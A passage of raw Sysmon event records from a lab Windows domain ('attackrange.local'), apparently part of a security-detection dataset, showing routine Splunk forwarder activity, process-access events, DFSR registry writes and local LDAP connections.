Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080730Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.153{2FDD8D40-B173-615A-2C01-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080729Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:59.137{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F21A9B0E5BD712FB9523741BDECF90BE,SHA256=E2A6E6C0586D58ACEDE88194571169451BCBDD3ED6631B4A63C5FB6401DD8655,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102828Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:58.202{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49472-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000102827Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:58.202{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49472-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x8000000000000000102826Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.127{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BC12E37A5B32F2EFAE4DBBB0E7726E0,SHA256=F81C272252688F0671061F29722AA1244F7C9C9D141884789B78794D86B9F793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102825Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.127{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B54B18E1EB057CDC45465A655903761,SHA256=12D4FBF9B7674EFCB8F6E0E08557953404852C2E4D5F045F6B093AC3A16170C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102824Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B172-615A-AE01-00000000FC01}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102823Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102822Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102821Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102820Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102819Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B172-615A-AE01-00000000FC01}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102818Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:59.096{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B172-615A-AE01-00000000FC01}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102817Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:58.690{58E9C193-B172-615A-AE01-00000000FC01}6372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102851Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.767{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BC12E37A5B32F2EFAE4DBBB0E7726E0,SHA256=F81C272252688F0671061F29722AA1244F7C9C9D141884789B78794D86B9F793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102850Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.611{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E99468D10F7DB816FBDC07DEFAC4C9,SHA256=C310AB624ACE63220D6A61E1EB65228C5C16E4F6167FBF4DCC4F0E923939F23B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000102849Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:00.611{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x8000000000000000102848Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:00.611{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Config SourceDWORD (0x00000001) 13241300x8000000000000000102847Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:00.611{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_4D264F37-7FD1-4957-AA29-D51476710399.XML 23542300x800000000000000080746Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:00.371{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87C784399AE2EA0A942856DB3025253E,SHA256=66D770CB9D134DF2F6793933EFADF538671239FBCFA00F4900C3E123363D5B82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080745Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:00.371{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8652467FC160FCDD5F0AC27EEF1C37F2,SHA256=E553099C040A555C26875AD56F79C0067880D37B50924681534D974F63BE28AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080744Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:00.137{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=410EDED15D3950DCBFBDEE557D00BA5B,SHA256=F668F28422A1E3DB808237B921EFA594FB0B8EE3A3ADE1699BF2B579D100D814,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102846Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B174-615A-B001-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102845Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102844Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102843Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102842Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102841Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B174-615A-B001-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102840Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.439{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B174-615A-B001-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102839Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.440{58E9C193-B174-615A-B001-00000000FC01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102852Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:01.627{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3636E3498315D2374A7A9F0D681B9F6B,SHA256=74DD84F5F864294C7D0E78DF6ECBFEAD24A3BAB7CABFE235E2BB5832E3EC157E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080747Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:01.137{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB1AF155A3E5B18E7252A300D5A1447A,SHA256=DC814EB01F0A36B4CCD9C5E13163E55566AA651BEE6595BC6F7A60CB521D7083,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102869Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:01.452{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49476-false10.0.1.12-8000- 354300x8000000000000000102868Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.855{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49475-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000102867Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.855{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49475-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000102866Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.847{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49474-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000102865Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.847{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49474-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000102864Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.829{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49473-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000102863Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:00.829{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49473-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 23542300x8000000000000000102862Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:02.642{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 